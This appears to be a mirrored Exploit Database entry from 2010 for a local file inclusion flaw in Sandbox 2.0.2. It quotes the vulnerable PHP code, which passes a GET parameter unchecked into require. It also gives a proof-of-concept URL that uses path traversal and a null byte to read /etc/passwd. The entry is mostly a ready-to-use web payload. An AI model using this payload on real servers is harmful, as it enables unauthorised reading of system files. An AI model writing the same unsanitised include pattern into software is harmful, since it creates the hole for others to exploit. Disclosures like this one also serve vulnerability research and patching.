Sandbox 2.0.2 – Local File Inclusion

• Exploit Database
• 14 阅读

• 作者： saudi0hacker
  日期： 2010-07-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14208/

• : # Tested on: Linux os: 
  : # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
  ----------------------------------------------------------------------------
  
   [+] file:index.php on line 75
   [+] Code:
   <?
   else {
  	$module = $_GET['a'];
   }
  
   require 'modules/'. $module . '.php';
   ?>
  
   [+] PoC:http://localhost/index.php?a=../../../../../etc/passwd%00